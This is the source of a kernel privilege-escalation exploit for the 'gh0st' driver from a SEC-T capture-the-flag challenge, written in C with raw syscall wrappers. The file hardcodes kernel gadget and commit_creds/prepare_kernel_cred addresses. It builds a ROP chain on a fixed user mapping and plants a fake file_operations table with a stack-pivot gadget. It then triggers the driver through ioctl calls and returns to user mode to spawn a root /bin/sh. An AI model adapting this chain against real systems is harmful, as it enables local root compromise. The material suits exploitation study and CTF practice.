SEC-T CTF gh0st
// gcc -static -nostdlib -masm=intel ./exp.c -o exp
// raw syscall wrappers (no libc is linked)
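// Raw read(2), syscall 0.  Returns the byte count, or -errno on failure
// (no libc, so errno is never set; callers test for a negative result).
// Explicit register constraints plus the rcx/r11 clobbers replace the
// original's bare "mov rax, 0; syscall", which also fell off the end of a
// non-void function and depended on -masm=intel.
int read(int fd, char* buf, int len) {
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "0"(0L), "D"((long)fd), "S"(buf), "d"((long)len)
                     : "rcx", "r11", "memory");
    return (int)ret;
}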
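// Raw write(2), syscall 1.  Returns the byte count written, or -errno on
// failure (raw syscall convention; errno is never set).  The "memory"
// clobber makes sure the buffer contents are stored before the syscall;
// rcx/r11 are clobbered by the instruction itself.
int write(int fd, char* buf, int len) {
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "0"(1L), "D"((long)fd), "S"(buf), "d"((long)len)
                     : "rcx", "r11", "memory");
    return (int)ret;
}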
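// Raw open(2), syscall 2.  Returns a descriptor, or -errno on failure.
// The mode argument (rdx) is passed as 0 explicitly; it only matters with
// O_CREAT, which this file never uses, but leaving rdx unset made the call
// depend on whatever the caller left in that register.
int open(char* filename, int flags) {
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "0"(2L), "D"(filename), "S"((long)flags), "d"(0L)
                     : "rcx", "r11", "memory");
    return (int)ret;
}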
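// Raw close(2), syscall 3.  Returns 0, or -errno on failure.
// The original loaded rax with 2, which is open(2), not close(2); the
// wrapper is never called in this file, so the mistake was invisible.
int close(int fd) {
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "0"(3L), "D"((long)fd)
                     : "rcx", "r11", "memory");
    return (int)ret;
}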
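// Raw exit(2), syscall 60 (exit, not exit_group).  Terminates the calling
// task with `status` and never returns; nothing is flushed because there
// is no libc.
void exit(int status) {
    __asm__ volatile("syscall"
                     :
                     : "a"(60L), "D"((long)status)
                     : "rcx", "r11", "memory");
    __builtin_unreachable();
}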
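// Raw ioctl(2), syscall 16.  Returns the driver's result, or -errno on
// failure.  What `cmd` and `arg` mean is entirely up to the driver behind
// `fd`; this wrapper only marshals the three registers.
int ioctl(unsigned int fd, unsigned int cmd, char* arg) {
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "0"(16L), "D"((unsigned long)fd), "S"((unsigned long)cmd), "d"(arg)
                     : "rcx", "r11", "memory");
    return (int)ret;
}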
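// Raw execve(2), syscall 59.  Only returns on failure, with -errno.
// argv/envp may be null pointers; the kernel treats them as empty.
int execve(char *filename, char *const argv[], char *const envp[]) {
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "0"(59L), "D"(filename), "S"(argv), "d"(envp)
                     : "rcx", "r11", "memory");
    return (int)ret;
}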
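// Raw mmap(2), syscall 9.  Returns the mapping address, or -errno cast to
// a pointer on failure (raw convention; there is no libc MAP_FAILED).
// The kernel takes the 4th argument in r10 rather than rcx (which the
// syscall instruction clobbers), so flags/fd/offset are bound to r10/r8/r9
// explicitly instead of relying on what the caller left in those registers.
void *mmap(void *addr, unsigned long length, int prot, int flags, int fd, unsigned long offset) {
    register long r10 __asm__("r10") = flags;
    register long r8 __asm__("r8") = fd;
    register long r9 __asm__("r9") = (long)offset;
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "0"(9L), "D"(addr), "S"(length), "d"((long)prot),
                       "r"(r10), "r"(r8), "r"(r9)
                     : "rcx", "r11", "memory");
    return (void *)ret;
}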
// helpers (minimal libc replacements)
// Length of a NUL-terminated string, returned as int (libc replacement).
int strlen(char* string) {
    char *end = string;
    while (*end) {
        end++;
    }
    return (int)(end - string);
}
// Write `string` to stdout (fd 1).  Unlike libc puts, no newline is
// appended; callers include it in the literal.
void puts(char* string) {
    write(1, string, strlen(string));
}
// Fill `len` bytes starting at `a` with `b` (libc replacement).
// A zero or negative `len` writes nothing.
void memset(char* a, char b, int len) {
    char *cursor = a;
    while (len-- > 0) {
        *cursor++ = b;
    }
}
// constants used by the exploit body
// Linux ABI values for open(2)/mmap(2); spelled out here because nothing
// from libc is included (-nostdlib).
#define O_RDONLY 0
#define O_RDWR 00000002      // octal literal, i.e. 2
#define PROT_READ 0x1
#define PROT_WRITE 0x2
#define MAP_POPULATE 0x8000  // pre-fault the mapping's pages
// gadgets and kernel symbol addresses
// Fixed kernel virtual addresses for the challenge kernel, from the author's
// gadget search (the disassembly is quoted per line).  They hold only for
// that exact build loaded at its default base: a rebuild or a randomised
// base (KASLR) changes every one of them.
unsigned long pop_rdi = 0xffffffff81000a78; // 0xffffffff81000a78: pop rdi ; ret ; (1290 found)
unsigned long mov_rdi_rax_call_rcx = 0xffffffff8103671d; // 0xffffffff8103671d: mov rdi, rax ; call rcx ; (2 found)
unsigned long pop_rcx = 0xffffffff8101d6dc; // 0xffffffff8101d6dc: pop rcx ; ret ; (19 found)
unsigned long xor_rax = 0xffffffff81076cc0; // 0xffffffff81076cc0: xor rax, rax ; ret ; (5 found) -- not used by _start
unsigned long iretq = 0xffffffff812009d0; // 0xffffffff812009d0: 48 cf iretq
unsigned long swapgs_popfq_ret = 0xffffffff81200bea; // swapgs ; popfq ; ret, per its name (no disassembly quoted)
unsigned long pivot_gadget = 0xffffffff810f3d0e; // 0xffffffff810f3d0e: mov esp, 0x8948FFF8 ; ret ; (1 found)
// Kernel symbol addresses (functions, not gadgets) for the same build.
unsigned long commit_creds = 0xffffffff81038563;
unsigned long prepare_kernel_cred= 0xffffffff81038715;
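// User-mode segment selectors and flags captured by save_state(); _start
// copies them into the frame it builds so the return to user mode restores
// the original cs/ss/rflags.
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;

// Snapshot the current cs, ss and rflags into the globals above.
//
// Each value is read by one self-contained asm statement with a proper
// output constraint.  The original split pushfq and popq into two
// statements (nothing stops the compiler from touching the stack in
// between), used the non-standard "r=" spelling, and fed the uninitialised
// globals back in as inputs.  The {att|intel} template alternatives keep
// the code assembling with or without -masm=intel.
static void save_state(void) {
    __asm__ volatile("mov {%%cs, %0|%0, cs}" : "=r"(user_cs));
    __asm__ volatile("mov {%%ss, %0|%0, ss}" : "=r"(user_ss));
    __asm__ volatile("pushfq\n\tpop %0" : "=r"(user_rflags));
}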
// Replace the process image with /bin/sh; no environment is passed.
// Only returns if execve fails.
void shell(void) {
    char *argv[2];
    argv[0] = "/bin/sh";
    argv[1] = 0;
    execve(argv[0], argv, 0);
}
/*
 * Process entry point.  The binary is built with -nostdlib (gcc line at the
 * top of the file), so there is no main() and no libc: every call below goes
 * through the raw syscall wrappers and helpers defined above.
 *
 * Nothing here is portable.  It is pinned to one kernel build through the
 * gadget/symbol addresses in the globals above, the module address
 * 0xffffffffa0002380 written into buf, and the fixed user mapping at
 * 0x8948f000 that the pivot gadget's `mov esp, 0x8948FFF8` lands in.  A
 * different build or a randomised kernel base (KASLR) invalidates the
 * addresses, and SMAP is the mitigation against the kernel stack being moved
 * into a user mapping at all.  The ioctl command numbers and the byte format
 * handed to the driver ("BFBF" header, size, '+'/'-'/',' stream) are defined
 * by the gh0st driver, which is not part of this file.
 */
void _start(void) {
    int i = 0;                   // unused: every loop below declares its own `i`
    char buf[0x1000];            // request buffer handed to the driver
    int fd;                      // /dev/gh0st
    int fds[0x100];              // 0x100 extra descriptors on /home/ctf/banner
    unsigned long* fake_stack;   // write cursor into the fixed mapping below
    save_state();                // capture user cs/ss/rflags for the iretq frame
    // 0x32 == MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED (not #defined above); the
    // integer literal is converted to void* implicitly (compiler warning).
    fake_stack = mmap(0x8948f000, 0x10000, PROT_READ|PROT_WRITE, 0x32 | MAP_POPULATE, -1, 0);
    fake_stack += (0xff8/8);     // -> 0x8948fff8, the value the pivot gadget loads into esp
    // Laid out upward from there: the gadget sequence, then the five-qword
    // iretq frame (rip, cs, rflags, rsp, ss) that returns to shell() in user mode.
    *fake_stack++ = pop_rdi;
    *fake_stack++ = 0;                      // rdi = 0
    *fake_stack++ = prepare_kernel_cred;
    *fake_stack++ = pop_rcx;
    *fake_stack++ = commit_creds;           // rcx = commit_creds
    *fake_stack++ = mov_rdi_rax_call_rcx;   // rdi = rax, then call rcx
    *fake_stack++ = swapgs_popfq_ret;
    *fake_stack++ = 0x246;                  // rflags value restored by popfq
    *fake_stack++ = iretq;
    *fake_stack++ = &shell;                 // iretq frame: rip
    *fake_stack++ = user_cs;                //              cs
    *fake_stack++ = user_rflags;            //              rflags
    *fake_stack++ = 0x8948f000 + 0x8000;    //              rsp, inside this mapping
    *fake_stack++ = user_ss;                //              ss
    fd = open("/dev/gh0st", O_RDWR);
    if (fd < 0) {                // raw syscall: a negative result is -errno
        puts("open error\n");
        exit(1);
    }
    // Hold 0x100 descriptors on the banner file open; they are read at the end.
    for (int i=0; i<0x100; i++) {
        fds[i] = open("/home/ctf/banner", O_RDONLY);
        if (fds[i] < 0) {
            puts("open error fds\n");
            exit(1);
        }
    }
    // create
    buf[0] = 'B'; buf[1] = 'F'; buf[2] = 'B'; buf[3] = 'F'; // header
    buf[4] = 0x80; buf[5] = 0x0; buf[6] = 0; buf[7] = 0; // size (little-endian 0x80)
    memset(buf + 8, '+', 0x1000 - 8);
    ioctl(fd, 0x1337B4B3, buf);  // driver-defined command; its semantics are not visible here
    // A kernel address (module at 0xffffffffa0002380, +0x108) is written over
    // the size field.  Presumably buf is placed at that module address by the
    // driver, so this points at the block filled in next -- verify against
    // the driver source.
    *(unsigned long*)(buf+0x8) = (unsigned long)0xffffffffa0002380 + 0x108;
    // fake ramfs_file_operations: 0x100 zero bytes at offset 0x108, with the
    // third slot set to the pivot gadget
    for (int i=0; i<0x100/8; i++) {
        *(unsigned long*)(buf+0x108 + i*8) = 0;
    }
    *(unsigned long*)(buf+0x108 + 2 * 8) = pivot_gadget;
    // The author's notes below describe how the driver interprets the bytes
    // from 0x208 on ('-' decrease stack ptr, ',' write stack, '+' increase
    // stack ptr); that interpreter lives in the driver, not in this file.
    memset(buf + 0x208, '-', 0x1000-0x208); // decrease stack ptr
    for (int i=0; i<8; i++) {
        buf[0x208+0xb0 + i*2 ] = ','; // write stack
        buf[0x209+0xb0 + i*2] = '+'; // increase stack ptr
    }
    write(fd, buf, 0x1000);      // hand the whole 0x1000-byte buffer to the driver
    ioctl(fd, 0xAC1DC0DE, buf);  // driver-defined command
    for (int i=0; i<0x100; i++) {
        read(fds[i], buf, 0x1000);   // return values are not checked
    }
    while (1) {}                 // keep the process alive; the exit(0) below is unreachable
    exit(0);
}